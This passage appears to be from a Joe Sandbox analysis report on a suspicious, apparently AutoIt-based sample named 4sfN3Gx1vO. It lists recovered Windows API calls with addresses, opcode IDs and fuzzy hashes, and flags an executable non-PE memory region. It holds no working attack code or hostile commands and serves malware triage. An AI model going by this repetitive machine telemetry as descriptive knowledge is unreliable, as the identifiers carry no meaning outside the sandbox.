                                                • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,0051543F,?,00010000,00000000,00000000,00000000,00000000), ref: 00519A9C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 9398367530493682f61284e789b2909a91614081ae313e4d64705641155a7b60
                                                • Instruction ID: 751d9bdb0d50df1e5ee8fb8f8962804a7f3308dfd68a7396b0fe3bb904011359
                                                • Opcode Fuzzy Hash: 9398367530493682f61284e789b2909a91614081ae313e4d64705641155a7b60
                                                • Instruction Fuzzy Hash: 33116A352047019FE7248E05C890BA2BBF9BF44350F10C42DE59B86651C771A889CB60
                                                APIs
                                                  • Part of subcall function 00544C7D: RtlAllocateHeap.NTDLL(00000008,00511129,00000000,?,00542E29,00000001,00000364,?,?,?,0053F2DE,00543863,005E1444,?,0052FDF5,?), ref: 00544CBE
                                                • _free.LIBCMT ref: 0054506C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: AllocateHeap_free
                                                • String ID:
                                                • API String ID: 614378929-0
                                                • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                • Instruction ID: faf7293bcd45e29fdd4cd395ffc8697be0ccd866822b4e37b3ecc14e7bffd585
                                                • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                • Instruction Fuzzy Hash: 090126762047056BE3218E659889ADAFFE9FB89374F65051DE18883281EA30A805C6B4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                • Instruction ID: 6c5e10eb16971aa7c5077b82ff950d0662c1c295916054eef83bed6e1020f663
                                                • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                • Instruction Fuzzy Hash: 57F02D32510A1597D7313A65AC0FB9B3FE8BFD2339F100719F424931D1CB70D80186A5
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000008,00511129,00000000,?,00542E29,00000001,00000364,?,?,?,0053F2DE,00543863,005E1444,?,0052FDF5,?), ref: 00544CBE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: b9e1522ed38326f20b62199e8f248f0d4790d6e57c2baea3e7d318970a886a16
                                                • Instruction ID: 4659401197991350d627ea968523f16c841bb239aadb1ac43c86834c658446de
                                                • Opcode Fuzzy Hash: b9e1522ed38326f20b62199e8f248f0d4790d6e57c2baea3e7d318970a886a16
                                                • Instruction Fuzzy Hash: 52F0E93168222567DB215F72AC8DBDB3F98BF917A9F1C4121BC15AA281CA30DC009EE0
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000000,?,005E1444,?,0052FDF5,?,?,0051A976,00000010,005E1440,005113FC,?,005113C6,?,00511129), ref: 00543852
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 1fc77640f5bb0d2085960ab3dbfc0d280e7bce6a13504e8330d23459534c25dc
                                                • Instruction ID: 2f5f05b9be6bcdeb8d9d0c5cea27efbf4dca003c3cd192af6aa530af4a067f40
                                                • Opcode Fuzzy Hash: 1fc77640f5bb0d2085960ab3dbfc0d280e7bce6a13504e8330d23459534c25dc
                                                • Instruction Fuzzy Hash: F9E02B3110322596D7312A779C04BDBBF49BF927B8F050030BC14965B0DB21ED019AE1
                                                APIs
                                                • FreeLibrary.KERNEL32(?,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514F6D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: 5241ec33e3ed82c3b07d9b72859507fc65ff1a261b66233116e9e32668ce8d68
                                                • Instruction ID: 2c9151721821c03295ce8f418c1f18d359c46c982612447c3d2c6a9ce3916412
                                                • Opcode Fuzzy Hash: 5241ec33e3ed82c3b07d9b72859507fc65ff1a261b66233116e9e32668ce8d68
                                                • Instruction Fuzzy Hash: B4F01571105792CFEB349F64E4948A2BFE4BF15329324997EE1EA86721C7319889DF10
                                                APIs
                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00512DC4
                                                  • Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: LongNamePath_wcslen
                                                • String ID:
                                                • API String ID: 541455249-0
                                                • Opcode ID: 1caff749c3c295e75cceea02674f4a6ab957183f92078c586c7744f08f545cca
                                                • Instruction ID: af6bb60d88b20b4a14c9e3f61be18ee2463dd605261ee7774c41c0eb110563f5
                                                • Opcode Fuzzy Hash: 1caff749c3c295e75cceea02674f4a6ab957183f92078c586c7744f08f545cca
                                                • Instruction Fuzzy Hash: B9E0CD766041245BC71092589C09FEA7BDDEFC8790F050071FD09D7248DA60AD848550
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: __fread_nolock
                                                • String ID:
                                                • API String ID: 2638373210-0
                                                • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                • Instruction ID: 4af60ae06e8a28e03a92370fb77e0dabebe6cbf16edd06e3fed704e15c7571f9
                                                • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                • Instruction Fuzzy Hash: D8E048B06097005FDF396A28A8517B6BBD4AF49300F10045EF59F92252E5726845874D
                                                APIs
                                                  • Part of subcall function 00513837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00513908
                                                  • Part of subcall function 0051D730: GetInputState.USER32 ref: 0051D807
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00512B6B
                                                  • Part of subcall function 005130F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0051314E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                • String ID:
                                                • API String ID: 3667716007-0
                                                • Opcode ID: de095e054a15b48a2d6c0faef4dbe459d926b0fff45b7e8c14b353759a33b607
                                                • Instruction ID: 9e774b8ef3a567c51a5a47a9b086c4ec7cdf331ecb298829a5f51daef80eac61
                                                • Opcode Fuzzy Hash: de095e054a15b48a2d6c0faef4dbe459d926b0fff45b7e8c14b353759a33b607
                                                • Instruction Fuzzy Hash: D3E0863130424617EB08BB75A86A5EDBF99BBE5351F40153EF182472A2CF658AC98352
                                                APIs
                                                • CreateFileW.KERNELBASE(00000000,00000000,?,00550704,?,?,00000000,?,00550704,00000000,0000000C), ref: 005503B7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 54f1aac22010cd729c72b798458b2d50dd5650f05d8a71586cfef900dec2cc58
                                                • Instruction ID: e3fdca1bd9b971a046894b3aa3ac286079517264a556a7e70bb7ea0c106ed27b
                                                • Opcode Fuzzy Hash: 54f1aac22010cd729c72b798458b2d50dd5650f05d8a71586cfef900dec2cc58
                                                • Instruction Fuzzy Hash: 8AD06C3214010DBBDF028F84DD06EDA3FAAFB48714F014000BE1856020C736E821EB90
                                                APIs
                                                • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00511CBC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: InfoParametersSystem
                                                • String ID:
                                                • API String ID: 3098949447-0
                                                • Opcode ID: 47ad4b8e05770eede9ba130daf9b36dba2778459329f13e8e9734d64e9f979a1
                                                • Instruction ID: c4d423dec8d936809a059062ce4fa6cb68b61af6229407aa99593c5eb325b763
                                                • Opcode Fuzzy Hash: 47ad4b8e05770eede9ba130daf9b36dba2778459329f13e8e9734d64e9f979a1
                                                • Instruction Fuzzy Hash: 96C09B352803449FF3184780BD8AF107754A36CB01F444401F6895D5E3C7B11814FA54
                                                APIs
                                                • GetTempPathW.KERNEL32(00000104,?), ref: 0056D8E9
                                                  • Part of subcall function 005133A7: _wcslen.LIBCMT ref: 005133AB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: PathTemp_wcslen
                                                • String ID:
                                                • API String ID: 1974555822-0
                                                • Opcode ID: d9958b39f951ab8db3dfdeefc5d7f1c4577f68be0aa2864997b11fb91fec9c53
                                                • Instruction ID: 66fee0c7baf0924bc74beba94427e70da96b5567ad45a1c29652cb38491f6487
                                                • Opcode Fuzzy Hash: d9958b39f951ab8db3dfdeefc5d7f1c4577f68be0aa2864997b11fb91fec9c53
                                                • Instruction Fuzzy Hash: C7C04C7850101A9BDB909790CDD9AA87B34FF10301F5044D5E246950509E705A889B11
                                                APIs
                                                  • Part of subcall function 00515745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0051949C,?,00008000), ref: 00515773
                                                • GetLastError.KERNEL32(00000002,00000000), ref: 005876DE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CreateErrorFileLast
                                                • String ID:
                                                • API String ID: 1214770103-0
                                                • Opcode ID: 7012087aa1cd6d163b50e1aebf1e9603479ad0bec23d2ee13068b99ac113dcc5
                                                • Instruction ID: 922f3f50dde9756997be3aa71108d311fc7b45cd038a059e6266162e78a8269f
                                                • Opcode Fuzzy Hash: 7012087aa1cd6d163b50e1aebf1e9603479ad0bec23d2ee13068b99ac113dcc5
                                                • Instruction Fuzzy Hash: E181A3302087069FDB15EF28C495AA9BBE1BF89310F14491DFC966B392DB30ED85CB52
                                                APIs
                                                • Sleep.KERNELBASE(000001F4), ref: 01602D31
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087758926.0000000001600000.00000040.00000020.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1600000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                • Instruction ID: 6d607d613c0447acde0502c5f42d63e3332556d973c6f8a88646b2253753de3d
                                                • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                • Instruction Fuzzy Hash: 57E0BF7594110DEFDB00EFA4D94D6DE7BB4EF04301F1005A5FD05D7691DB309E548A62
                                                APIs
                                                • Sleep.KERNELBASE(000001F4), ref: 01602D31
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087758926.0000000001600000.00000040.00000020.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1600000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                • Instruction ID: 10928a9aa6a773d6620274100929e26233caace0f45b724e6033734b9d02d0e8
                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                • Instruction Fuzzy Hash: 89E0E67594110DDFDB00EFB4D94D69E7FB4EF04301F100165FD01D2281D6309D508A62
                                                APIs
                                                  • Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2
                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 005A961A
                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 005A965B
                                                • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 005A969F
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 005A96C9
                                                • SendMessageW.USER32 ref: 005A96F2
                                                • GetKeyState.USER32(00000011), ref: 005A978B
                                                • GetKeyState.USER32(00000009), ref: 005A9798
                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 005A97AE
                                                • GetKeyState.USER32(00000010), ref: 005A97B8
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 005A97E9
                                                • SendMessageW.USER32 ref: 005A9810
                                                • SendMessageW.USER32(?,00001030,?,005A7E95), ref: 005A9918
                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 005A992E
                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 005A9941
                                                • SetCapture.USER32(?), ref: 005A994A
                                                • ClientToScreen.USER32(?,?), ref: 005A99AF
                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 005A99BC
                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 005A99D6
                                                • ReleaseCapture.USER32 ref: 005A99E1
                                                • GetCursorPos.USER32(?), ref: 005A9A19
                                                • ScreenToClient.USER32(?,?), ref: 005A9A26
                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 005A9A80
                                                • SendMessageW.USER32 ref: 005A9AAE
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 005A9AEB
                                                • SendMessageW.USER32 ref: 005A9B1A
                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 005A9B3B
                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 005A9B4A
                                                • GetCursorPos.USER32(?), ref: 005A9B68
                                                • ScreenToClient.USER32(?,?), ref: 005A9B75
                                                • GetParent.USER32(?), ref: 005A9B93
                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 005A9BFA
                                                • SendMessageW.USER32 ref: 005A9C2B
                                                • ClientToScreen.USER32(?,?), ref: 005A9C84
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 005A9CB4
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 005A9CDE
                                                • SendMessageW.USER32 ref: 005A9D01
                                                • ClientToScreen.USER32(?,?), ref: 005A9D4E
                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 005A9D82
                                                  • Part of subcall function 00529944: GetWindowLongW.USER32(?,000000EB), ref: 00529952
                                                • GetWindowLongW.USER32(?,000000F0), ref: 005A9E05
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                • String ID: @GUI_DRAGID$F$p#^
                                                • API String ID: 3429851547-1742403966
                                                • Opcode ID: 508a200880fb2dcc4a96c1f3b3d0f8ba6faf4fc5b40d4db587102515b123718b
                                                • Instruction ID: 8b808e43fcf4666124bd06d5fd4d09a42a9fe7d8a9a0dbda268f7e4305b14c51
                                                • Opcode Fuzzy Hash: 508a200880fb2dcc4a96c1f3b3d0f8ba6faf4fc5b40d4db587102515b123718b
                                                • Instruction Fuzzy Hash: 8E427E34604251AFDB25CF28CC84AAEBFE5FF9A310F140A19F6998B2A1D731E854DF51
                                                APIs
                                                • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 005A48F3
                                                • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 005A4908
                                                • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 005A4927
                                                • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 005A494B
                                                • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 005A495C
                                                • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 005A497B
                                                • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 005A49AE
                                                • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 005A49D4
                                                • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 005A4A0F
                                                • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 005A4A56
                                                • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 005A4A7E
                                                • IsMenu.USER32(?), ref: 005A4A97
                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 005A4AF2
                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 005A4B20
                                                • GetWindowLongW.USER32(?,000000F0), ref: 005A4B94
                                                • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 005A4BE3
                                                • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 005A4C82
                                                • wsprintfW.USER32 ref: 005A4CAE
                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 005A4CC9
                                                • GetWindowTextW.USER32(?,00000000,00000001), ref: 005A4CF1
                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 005A4D13
                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 005A4D33
                                                • GetWindowTextW.USER32(?,00000000,00000001), ref: 005A4D5A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                • String ID: %d/%02d/%02d
                                                • API String ID: 4054740463-328681919
                                                • Opcode ID: 0c04b1048c40f5069846f9c1fc17b47e059fff40233b5c6134db9a5d24a40eae
                                                • Instruction ID: ff3a53fc80c8389ccc4f5d2e9e7ab0a3bb3ed87342e9b58df4dc6d93e7d984d5
                                                • Opcode Fuzzy Hash: 0c04b1048c40f5069846f9c1fc17b47e059fff40233b5c6134db9a5d24a40eae
                                                • Instruction Fuzzy Hash: 9312CC71600255ABEB258FA8DC49BAE7FF8BF86310F104529F516EB2E1DBB49940CF50
                                                APIs
                                                • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0052F998
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0056F474
